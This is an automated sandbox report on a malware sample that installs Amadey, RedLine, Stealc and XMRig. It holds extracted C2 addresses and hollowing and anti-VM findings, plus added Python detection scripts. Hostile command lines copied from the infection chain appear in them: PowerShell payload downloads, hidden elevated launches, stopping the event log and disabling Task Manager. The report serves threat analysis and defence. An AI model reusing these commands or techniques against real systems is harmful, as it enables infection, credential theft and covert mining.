Analysis
max time kernel: 143s
max time network: 148s
platform: windows11-21h2_x64
resource: win11-20240611-en
resource tags: arch:x64, arch:x86, image:win11-20240611-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 26-06-2024 23:54
Static task: static1
Behavioral task: behavioral1
Sample: c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
Resource: win10v2004-20240508-en
Behavioral task: behavioral2
Sample: c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
Resource: win11-20240611-en
General
Target: c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
Size: 1.8MB
MD5: 5cce8686e206242b06755e8d3b980097
SHA1: e2817338b2d55f57189dc48634613187adca42d5
SHA256: c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93
SHA512: 81c957a13d1667f722856a15c6ec07da3bd1676c72199971579fb1b6b2ba01e2466a35ddb8c7f1b6a4f3621ffd04b8ec2536bffe9e484f690e8c3a7fb1cd79f1
SSDEEP: 49152:wgh0Oc345yOwAvHcIBZjoWi9zgncIV2NyJN/LhdCNQO73+:Vh0f3iN/cAoV6c2eyz/Lhsd73+
All signature hits, memory dumps and process details below come from behavioral2 (the win11-20240611-en run).
Malware Config
Extracted: amadey
8254624243
e76b71
http://77.91.77.81
install_dir: 8254624243
install_file: axplong.exe
strings_key: 90049e51fabf09df0d6748e0b271922e
url_paths: /Kiru9gu/index.php
Extracted: redline
LiveTraffic
4.184.236.127:1110
Extracted: redline
123
185.215.113.67:40960
Extracted: redline
@OLEH_PSP
185.172.128.33:8970
Extracted: stealc
jopa
http://65.21.175.0
url_path: /108e010e8f91c38c.php
Extracted: redline
06-25-24
85.28.47.7:17210
The Amadey install_dir and install_file match the dropped loader path C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe in the process tree; the four RedLine configurations and the Stealc configuration were recovered from the payloads that loader downloaded.
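The configuration above, turned into network hunting artefacts. This is an added example, not part of the sandbox report or of any of the malware families' own code: it re-parses the family blocks exactly as this page prints them (the input is constructed from the report's own values) and emits a host blocklist plus Suricata rules for the HTTP check-in paths and the raw-TCP RedLine endpoints. The Suricata SIDs, rule messages and the indicator record layout are this example's own assumptions.

```python
"""Turn the extracted C2 configuration into a blocklist and Suricata rules.

Added example, not part of the sandbox report: the parser reads the
"Extracted <family> ..." blocks as this page prints them. Rule SIDs,
messages and the indicator layout are this example's own choices.
"""
import re
from typing import Dict, List
from urllib.parse import urlparse

# Constructed input: the "Malware Config" section of this report, one
# Extracted block per line, values verbatim.
CONFIG_TEXT = """
Extracted amadey 8254624243 e76b71 http://77.91.77.81 install_dir 8254624243 install_file axplong.exe strings_key 90049e51fabf09df0d6748e0b271922e url_paths /Kiru9gu/index.php
Extracted redline LiveTraffic 4.184.236.127:1110
Extracted redline 123 185.215.113.67:40960
Extracted redline @OLEH_PSP 185.172.128.33:8970
Extracted stealc jopa http://65.21.175.0 url_path /108e010e8f91c38c.php
Extracted redline 06-25-24 85.28.47.7:17210
"""

ATTR_KEYS = {"install_dir", "install_file", "strings_key", "url_paths", "url_path"}
SOCKET_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}:\d{1,5}$")


def parse_config(text: str) -> List[Dict]:
    """Split each 'Extracted <family> ...' line into family, free-text labels
    (botnet/campaign names), URLs, host:port sockets and key/value attributes."""
    configs = []
    for line in text.strip().splitlines():
        tokens = line.split()
        if len(tokens) < 2 or tokens[0] != "Extracted":
            continue
        cfg = {"family": tokens[1], "labels": [], "urls": [], "sockets": [], "attrs": {}}
        i = 2
        while i < len(tokens):
            tok = tokens[i]
            if tok in ATTR_KEYS and i + 1 < len(tokens):
                cfg["attrs"][tok] = tokens[i + 1]
                i += 2
                continue
            if tok.startswith(("http://", "https://")):
                cfg["urls"].append(tok)
            elif SOCKET_RE.match(tok):
                cfg["sockets"].append(tok)
            else:
                cfg["labels"].append(tok)
            i += 1
        configs.append(cfg)
    return configs


def indicators(configs: List[Dict]) -> List[Dict]:
    """One record per network endpoint. Amadey and Stealc beacon to
    <C2 host> + <url path>, so URL and path attribute are joined;
    RedLine speaks its own protocol over a bare TCP socket."""
    out = []
    for cfg in configs:
        label = " ".join(cfg["labels"])
        paths = cfg["attrs"].get("url_paths") or cfg["attrs"].get("url_path") or ""
        for url in cfg["urls"]:
            host = urlparse(url).hostname
            for path in (paths.split(",") if paths else [""]):
                out.append({"family": cfg["family"], "label": label, "proto": "http",
                            "host": host, "port": None, "path": path})
        for sock in cfg["sockets"]:
            host, port = sock.rsplit(":", 1)
            out.append({"family": cfg["family"], "label": label, "proto": "tcp",
                        "host": host, "port": int(port), "path": None})
    return out


def host_blocklist(inds: List[Dict]) -> List[str]:
    """Distinct C2 hosts, sorted, for a DNS/firewall blocklist."""
    return sorted({i["host"] for i in inds})


def suricata_rules(inds: List[Dict], base_sid: int = 9000000) -> List[str]:
    """One rule per indicator. HTTP check-ins match host and URI with sticky
    buffers; RedLine sockets are matched on destination IP and port only,
    so treat those as watchlist hits rather than blocking on them blindly."""
    rules = []
    for n, i in enumerate(inds, start=1):
        msg = f"MALWARE {i['family']} C2 ({i['label']})"
        if i["proto"] == "http":
            rules.append(
                f'alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"{msg}"; '
                f'flow:established,to_server; http.host; content:"{i["host"]}"; '
                f'http.uri; content:"{i["path"]}"; sid:{base_sid + n}; rev:1;)')
        else:
            rules.append(
                f'alert tcp $HOME_NET any -> {i["host"]} {i["port"]} (msg:"{msg}"; '
                f'flow:to_server; sid:{base_sid + n}; rev:1;)')
    return rules


if __name__ == "__main__":
    inds = indicators(parse_config(CONFIG_TEXT))
    print("\n".join(host_blocklist(inds)))
    print("\n".join(suricata_rules(inds)))
```

The unlabeled Amadey values (8254624243, e76b71) are kept as free-text labels rather than guessed field names, so the rule messages carry them verbatim.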
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
Processes (resource / yara rule):
- behavioral2/memory/3360-38-0x0000000000400000-0x0000000000450000-memory.dmp (family_redline) – PID 3360 is the RegAsm.exe hollowed by gold.exe
- C:\Users\Admin\AppData\Local\Temp\1000110001\123.exe (family_redline)
- C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exe (family_redline)
- behavioral2/memory/2832-226-0x0000000000E20000-0x0000000000E70000-memory.dmp (family_redline) – PID 2832 is 123.exe
- behavioral2/memory/900-227-0x0000000000A50000-0x0000000000AA0000-memory.dmp (family_redline) – PID 900 is svhosts.exe
- behavioral2/memory/4232-329-0x0000000000400000-0x0000000000450000-memory.dmp (family_redline) – PID 4232 is the stl.exe copy hollowed by stl.exe 4448
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
Processes (description / ioc / process):
- Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ by c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
- Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ by axplong.exe (4 instances)
XMRig Miner payload 11 IoCs
Processes (resource / yara rule): eleven dumps of the same 0x848000-byte region in PID 1680 match the xmrig rule. PID 1680 is the explorer.exe started by wfbrmcwrltkl.exe (the service binary installed by the sc.exe chain under rig.exe) and hollowed via SetThreadContext; the SeLockMemoryPrivilege that process later enables is what XMRig requests for large-page memory.
- behavioral2/memory/1680-{410,411,413,414,415,416,417,421,429,430,431}-0x0000000140000000-0x0000000140848000-memory.dmp (xmrig)
Blocklisted process makes network request 4 IoCs
Processes (flow / pid / process):
- flow 18: 3000 powershell.exe
- flow 19: 3000 powershell.exe
- flow 20: 4928 powershell.exe
- flow 21: 4928 powershell.exe
PID 3000 is the Invoke-WebRequest to https://bit.ly/4c7L8Zs and PID 4928 the download of File.zip from github.com in the process tree; the third PowerShell instance (4984) only launches install.bat and makes no request.
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Runs PowerShell with a hidden display window.
Processes (pid / process):
- 4984 powershell.exe
- 3000 powershell.exe
- 4928 powershell.exe
Creates new service(s) 2 TTPs
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes (description / ioc / process):
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion: c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe (1), axplong.exe (4)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion: c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe (1), axplong.exe (4)
Executes dropped EXE 25 IoCs
Processes (pid / process):
- 1428 axplong.exe
- 2828 gold.exe
- 4468 NewLatest.exe
- 2304 Hkbsse.exe
- 3096 Installer.exe
- 3384 ldr.exe
- 832 Hkbsse.exe
- 3564 alex5555555.exe
- 900 svhosts.exe
- 2832 123.exe
- 4688 Explorers.exe
- 4448 stl.exe
- 1580 rig.exe
- 1568 stl.exe
- 4876 Hkbsse.exe
- 4560 axplong.exe
- 584 O3B6wY7ZkFhh.exe
- 1772 stl.exe
- 4512 TpWWMUpe0LEV.exe
- 4232 stl.exe
- 3800 wfbrmcwrltkl.exe
- 4964 Hkbsse.exe
- 4544 axplong.exe
- 1300 Hkbsse.exe
- 2140 axplong.exe
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer that runs Windows applications on other operating systems and is used by some sandboxes as the execution environment; the presence of HKCU\Software\Wine therefore marks an analysis box.
Processes (description / ioc / process):
- Key opened \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine: axplong.exe (4), c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe (1)
Loads dropped DLL 3 IoCs
Processes (pid / process):
- 4512 TpWWMUpe0LEV.exe
- 4844 aspnet_regiis.exe (2)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX-packed payload in memory (yara rule upx) 16 IoCs
Processes (resource / yara rule): sixteen dumps of the same region in PID 1680 (the hollowed explorer.exe that also matches the xmrig rule above) are UPX-packed:
- behavioral2/memory/1680-{405,406,407,408,409,410,411,413,414,415,416,417,421,429,430,431}-0x0000000140000000-0x0000000140848000-memory.dmp (upx)
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes (description / ioc / process):
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" by Installer.exe
Caveat: a RunOnce value named wextract_cleanup0 that calls advpack.dll,DelNodeRunDLL32 on an IXP000.TMP folder is the standard self-cleanup entry written by the Windows IExpress/wextract self-extracting stub. It shows Installer.exe is an IExpress package (which unpacks and runs ins.bat), not a hand-rolled Run-key persistence mechanism; the real persistence is in the schtasks commands it spawns.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes (pid / process):
- 4360 powercfg.exe
- 2516 powercfg.exe
- 392 powercfg.exe
- 3304 powercfg.exe
- 1392 powercfg.exe
- 3292 powercfg.exe
- 3296 powercfg.exe
- 3440 powercfg.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Setting ThreadHideFromDebugger stops the kernel from delivering the thread's debug events to an attached debugger, a common anti-debugging step; here it is used by the initial sample and by every axplong.exe copy.
Processes (pid / process):
- 4008 c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
- 1428 axplong.exe
- 4560 axplong.exe
- 4544 axplong.exe
- 2140 axplong.exe
Suspicious use of SetThreadContext 6 IoCs
Processes (description / pid / process / target process):
- PID 2828 gold.exe set thread context of 3360 RegAsm.exe
- PID 3564 alex5555555.exe set thread context of 4260 RegAsm.exe
- PID 4512 TpWWMUpe0LEV.exe set thread context of 4844 aspnet_regiis.exe
- PID 4448 stl.exe set thread context of 4232 stl.exe
- PID 3800 wfbrmcwrltkl.exe set thread context of 1680 explorer.exe
- PID 584 O3B6wY7ZkFhh.exe set thread context of 1804 BitLockerToGo.exe
Each pair is the resume step of process hollowing: the dropper starts a legitimate, mostly Microsoft-signed host binary, overwrites its image (the eight-call WriteProcessMemory runs into RegAsm.exe listed below) and points the main thread at the new entry point. The yara hits confirm what was injected for three of the targets: RedLine in RegAsm.exe 3360 and stl.exe 4232, XMRig in explorer.exe 1680.
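The SetThreadContext pairs above, scored as hollowing candidates. This is an added example, not from the report or from any product: the process table and the pair list are constructed from values on this page (plus one invented benign control pair), and the three signals, the threshold and the verdict labels are this example's own.

```python
"""Rank SetThreadContext(src -> dst) events as process-hollowing candidates.

Added example, not part of the report. Three signals are scored per pair:
the source lives in a user-writable path, the target is a Windows-shipped
image, and the target was started with no arguments (RegAsm.exe and
aspnet_regiis.exe are never run bare by a legitimate caller).
"""
import re
from typing import Dict, List, Tuple

# Constructed process table (pid -> image, command line) from this page's tree,
# plus an invented benign vendor app (pids 100/101) as a control.
PROCS: Dict[int, Tuple[str, str]] = {
    2828: (r"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe",
           r'"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"'),
    3360: (r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
           r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'),
    3564: (r"C:\Users\Admin\AppData\Local\Temp\1000109001\alex5555555.exe",
           r'"C:\Users\Admin\AppData\Local\Temp\1000109001\alex5555555.exe"'),
    4260: (r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
           r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'),
    4512: (r"C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe",
           r'"C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"'),
    4844: (r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe",
           r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"'),
    4448: (r"C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe",
           r'"C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe"'),
    4232: (r"C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe",
           r"C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe"),
    3800: (r"C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe",
           r"C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe"),
    1680: (r"C:\Windows\explorer.exe", "explorer.exe"),
    584: (r"C:\Users\Admin\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe",
          r'"C:\Users\Admin\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe"'),
    1804: (r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe",
           r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"),
    100: (r"C:\Program Files\Vendor\app.exe", r'"C:\Program Files\Vendor\app.exe"'),
    101: (r"C:\Program Files\Vendor\worker.exe",
          r'"C:\Program Files\Vendor\worker.exe" --child-pipe 7'),
}

# (source pid, target pid) from the "Suspicious use of SetThreadContext" list.
SET_THREAD_CONTEXT = [(2828, 3360), (3564, 4260), (4512, 4844),
                      (4448, 4232), (3800, 1680), (584, 1804)]
CONTROL_PAIR = [(100, 101)]  # invented benign parent/child

USER_WRITABLE = re.compile(r"(?i)\\(Users\\[^\\]+\\AppData|Temp|ProgramData)\\")
WINDOWS_IMAGE = re.compile(r"(?i)^C:\\Windows\\")


def has_arguments(cmdline: str) -> bool:
    """True if anything follows the executable token (quoted or bare)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        rest = cmdline[end + 1:] if end != -1 else ""
    else:
        rest = cmdline.split(None, 1)[1] if " " in cmdline else ""
    return rest.strip() != ""


def score_pair(src: int, dst: int) -> Dict:
    """Collect the hollowing signals for one SetThreadContext event."""
    src_img, _ = PROCS[src]
    dst_img, dst_cmd = PROCS[dst]
    signals = []
    if USER_WRITABLE.search(src_img):
        signals.append("source runs from a user-writable path")
    if WINDOWS_IMAGE.match(dst_img):
        signals.append("target is a Windows-shipped image")
    if not has_arguments(dst_cmd):
        signals.append("target started with no arguments")
    if src_img.lower() == dst_img.lower():
        signals.append("self re-spawn (same image)")
    if len(signals) >= 3:
        verdict = "hollowing"
    elif signals:
        verdict = "suspicious"
    else:
        verdict = "no signal"
    return {"src": src, "dst": dst, "target": dst_img, "signals": signals, "verdict": verdict}


def rank(pairs) -> List[Dict]:
    """Score every pair, strongest evidence first."""
    return sorted((score_pair(s, d) for s, d in pairs), key=lambda r: -len(r["signals"]))


if __name__ == "__main__":
    for r in rank(SET_THREAD_CONTEXT + CONTROL_PAIR):
        print(r["src"], "->", r["dst"], r["verdict"], "|", "; ".join(r["signals"]))
```

The stl.exe pair has no Windows-image signal but still scores three because it re-spawns its own copy without arguments; a self re-spawn followed by SetThreadContext is the same technique with a less conspicuous host.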
Drops file in Windows directory 3 IoCs
Processes (description / ioc / process):
- File created C:\Windows\Tasks\axplong.job by c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
- File created C:\Windows\Tasks\Hkbsse.job by NewLatest.exe
- File created C:\Windows\Tasks\Hkbsse.job by ldr.exe
The .job files are Task Scheduler job definitions; together with the "Uses Task Scheduler COM API" signature below they explain the repeated level-1 re-launches of axplong.exe and Hkbsse.exe at the end of the process tree.
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system. Here the chain under rig.exe deletes and recreates the service xjuumoinznsp with binpath C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe and start= auto, stops the eventlog service (which silences Windows event logging for the rest of the run), and starts the new service; the service-hosted wfbrmcwrltkl.exe then hollows explorer.exe with the XMRig payload.
Processes (pid / process):
- 3032 sc.exe
- 1764 sc.exe
- 3704 sc.exe
- 3428 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes (pid / pid_target / process / target process):
- 3408 WerFault.exe for 2828 gold.exe
- 1620 WerFault.exe for 3564 alex5555555.exe
Both crashed processes are the RedLine injectors, which faulted after handing off to RegAsm.exe.
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes (description / ioc / process):
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 by aspnet_regiis.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString by aspnet_regiis.exe
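One way to turn the registry IoCs from the VirtualBox, BIOS, Wine and processor sections into a per-process verdict. This is an added example, not part of the report: the events are constructed from the IoCs above (plus one benign Run-key read as a control), and the rule table, technique names and the two-distinct-checks threshold are this example's own.

```python
"""Map registry reads from a sandbox trace to the evasion check each key serves.

Added example, not part of the report. Events have the shape this report
prints (description, native \\REGISTRY\\ path, process). The native roots are
rewritten to HKLM / HKU\\<SID> so one rule covers every user SID.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed input: a subset of the IoCs in the sections above, plus one
# ordinary Run-key read (notepad.exe) as a control that must not match.
SAMPLE = "c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe"
USER_HIVE = r"\REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000"
EVENTS: List[Tuple[str, str, str]] = [
    ("Key opened", r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__", SAMPLE),
    ("Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion", SAMPLE),
    ("Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion", SAMPLE),
    ("Key opened", USER_HIVE + r"\Software\Wine", SAMPLE),
    ("Key opened", r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__", "axplong.exe"),
    ("Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion", "axplong.exe"),
    ("Key opened", USER_HIVE + r"\Software\Wine", "axplong.exe"),
    ("Key opened", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0", "aspnet_regiis.exe"),
    ("Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString", "aspnet_regiis.exe"),
    ("Key opened", USER_HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Run", "notepad.exe"),
]

# (regex over the normalised path, check name, ATT&CK technique); this table is
# the example's own and covers only the keys seen in this report.
RULES = [
    (r"^HKLM\\HARDWARE\\ACPI\\(DSDT|FADT|RSDT)\\VBOX__", "VirtualBox ACPI table name", "T1497.001"),
    (r"^HKLM\\HARDWARE\\DESCRIPTION\\System\\(SystemBiosVersion|VideoBiosVersion)$", "BIOS vendor strings", "T1497.001"),
    (r"^HKU\\<SID>\\Software\\Wine$", "Wine compatibility-layer key", "T1497.001"),
    (r"^HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", "CPU brand string", "T1082"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), name, ttp) for p, name, ttp in RULES]
SID_RE = re.compile(r"^\\REGISTRY\\USER\\S-1-5-21-\d+-\d+-\d+-\d+(?P<cls>_Classes)?", re.IGNORECASE)


def normalise(path: str) -> str:
    """\\REGISTRY\\MACHINE -> HKLM; \\REGISTRY\\USER\\<any SID>[_Classes] -> HKU\\<SID>[_Classes]."""
    m = SID_RE.match(path)
    if m:
        return "HKU\\<SID>" + (m.group("cls") or "") + path[m.end():]
    if path.upper().startswith("\\REGISTRY\\MACHINE"):
        return "HKLM" + path[len("\\REGISTRY\\MACHINE"):]
    return path


def classify(events) -> Dict[str, Dict]:
    """Per process: distinct checks seen, their techniques, raw hit count and a
    verdict. One check can be incidental (installers read CPU info); two
    different checks from the same image are treated as deliberate fingerprinting."""
    per_proc: Dict[str, Dict] = defaultdict(lambda: {"checks": set(), "ttps": set(), "hits": 0})
    for _desc, path, proc in events:
        norm = normalise(path)
        for rx, name, ttp in COMPILED:
            if rx.match(norm):
                entry = per_proc[proc]
                entry["checks"].add(name)
                entry["ttps"].add(ttp)
                entry["hits"] += 1
    for entry in per_proc.values():
        entry["verdict"] = "sandbox-aware" if len(entry["checks"]) >= 2 else "single check"
    return dict(per_proc)


if __name__ == "__main__":
    for proc, entry in classify(EVENTS).items():
        print(proc, entry["verdict"], sorted(entry["checks"]))
```

Processes with no matching read (the notepad.exe control) are absent from the result rather than reported as clean, so the caller can tell "not checked" from "checked and benign".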
Modifies registry class 1 IoCs
Processes (description / ioc / process):
- Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings by powershell.exe
This key is routinely created by shell APIs (here the Start-Process call that launches install.bat) and is not an indicator on its own.
Modifies registry key 1 TTPs 1 IoCs
The single IoC is the reg.exe command in the process tree that sets HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr to 1 (see also "Disables Task Manager via registry modification" above).
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid / process):
- 4276 schtasks.exe
- 4668 schtasks.exe
- 3052 schtasks.exe
- 4292 schtasks.exe
- 4296 schtasks.exe
The tasks created in the process tree are "CCleaner" and "Updater" (chrome.exe opening http://starjod.xyz/Website.php every 10 and 11 minutes, created twice, the second time with /F) and "Cleaner" (C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe at system start).
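Detection logic for the powercfg, sc.exe, schtasks, reg.exe and PowerShell command lines that the Power Settings, sc.exe, Scheduled Task, registry and PowerShell sections above record. This is an added example, not part of the report or of any detection product; the rules, finding names, ATT&CK mappings and the sample lines (copied from the process tree, plus constructed benign controls) are this example's own.

```python
"""Score LOLBin command lines like the ones in this report's process tree.

Added example, not part of the report. Each rule is a regex over a
process-creation command line plus the behaviour it evidences, written so
the invocations in this report fire while routine administrative use of
the same binaries does not.
"""
import re
from typing import Dict, List, Tuple

RULES: List[Tuple[str, str, str]] = [
    # (regex, finding, ATT&CK technique)
    (r"(?i)\bpowercfg(\.exe)?\b.*\s/x\s+-(hibernate|standby|monitor)-timeout-(ac|dc)\s+0\b",
     "power timeout zeroed so the host never sleeps (keeps a miner running)", "T1653"),
    (r'(?i)\bsc(\.exe)?\s+create\s+.*binpath=\s*"?[^"]*\\(ProgramData|Users\\[^\\]+\\AppData)\\.*start=\s*"?auto',
     "auto-start service whose binary lives in a user-writable path", "T1543.003"),
    (r"(?i)\bsc(\.exe)?\s+stop\s+eventlog\b",
     "Windows Event Log service stopped", "T1562.002"),
    (r"(?i)\bschtasks(\.exe)?\b.*/create\b.*/sc\s+minute\b.*/tr\s+.*(chrome|msedge|firefox|iexplore)\.exe\S*\s+https?://",
     "task opens a URL in a browser every few minutes (traffic fraud)", "T1053.005"),
    (r"(?i)\bschtasks(\.exe)?\b.*/create\b.*/sc\s+onstart\b",
     "task runs at boot", "T1053.005"),
    (r"(?i)\breg(\.exe)?\s+add\s+HK\w+\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\b.*DisableTaskMgr.*/d\s+0*1\b",
     "Task Manager disabled through the Policies\\System key", "T1562.001"),
    (r"(?i)\bpowershell(\.exe)?\b.*Invoke-WebRequest\b.*-OutFile\b",
     "PowerShell downloads a file to disk", "T1105"),
    (r"(?i)\bpowershell(\.exe)?\b.*Invoke-WebRequest\b.*(bit\.ly|tinyurl\.com)/",
     "PowerShell fetches a URL-shortener link", "T1071.001"),
    (r"(?i)\bpowershell(\.exe)?\b.*Start-Process\b.*-Verb\s+runAs\b.*-WindowStyle\s+Hidden\b",
     "PowerShell launches a hidden process through a UAC elevation prompt", "T1059.001"),
]
COMPILED = [(re.compile(rx), finding, ttp) for rx, finding, ttp in RULES]

# Constructed sample: command lines copied from the process tree on this page ...
SAMPLE_CMDLINES = [
    r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0",
    r"C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0",
    r'C:\Windows\system32\sc.exe create "xjuumoinznsp" binpath= "C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe" start= "auto"',
    r"C:\Windows\system32\sc.exe stop eventlog",
    r'schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F',
    r'schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00',
    r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001",
    r'''powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"''',
    r'''powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"''',
    r'''powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"''',
]
# ... and invented benign controls that use the same binaries.
CONTROL_CMDLINES = [
    r"C:\Windows\system32\sc.exe query wuauserv",
    r"schtasks /create /tn Backup /tr C:\Tools\backup.exe /sc daily /st 02:00",
    r"powercfg /x -monitor-timeout-ac 15",
    r'powershell -Command "Get-Process"',
    r"reg add HKCU\Software\Contoso /v Setting /d 1",
]


def evaluate(cmdline: str) -> List[Dict[str, str]]:
    """All findings for one command line (empty list if none)."""
    return [{"finding": f, "technique": t} for rx, f, t in COMPILED if rx.search(cmdline)]


def scan_cmdlines(cmdlines) -> Dict[str, List[Dict[str, str]]]:
    """Map each command line that produced at least one finding to its findings."""
    result = {}
    for cmd in cmdlines:
        hits = evaluate(cmd)
        if hits:
            result[cmd] = hits
    return result


if __name__ == "__main__":
    for cmd, hits in scan_cmdlines(SAMPLE_CMDLINES + CONTROL_CMDLINES).items():
        print(cmd)
        for h in hits:
            print(f"   {h['technique']}: {h['finding']}")
```

The powercfg rule keys on the timeout being set to 0, and the service rule on an auto-start binary under ProgramData or AppData; both distinctions are what keep the controls quiet, so tune them rather than loosening the tool-name match when adapting the rules.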
Suspicious behavior: EnumeratesProcesses 47 IoCs
Processes (pid / process, number of entries):
- 4008 c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe (2)
- 1428 axplong.exe (2)
- 3000 powershell.exe (2)
- 4984 powershell.exe (2)
- 4928 powershell.exe (2)
- 3360 RegAsm.exe (3)
- 4688 Explorers.exe (1)
- 4560 axplong.exe (2)
- 900 svhosts.exe (4)
- 4844 aspnet_regiis.exe (4)
- 2832 123.exe (3)
- 4232 stl.exe (3)
- 1580 rig.exe (8)
- 3800 wfbrmcwrltkl.exe (5)
- 4544 axplong.exe (2)
- 2140 axplong.exe (2)
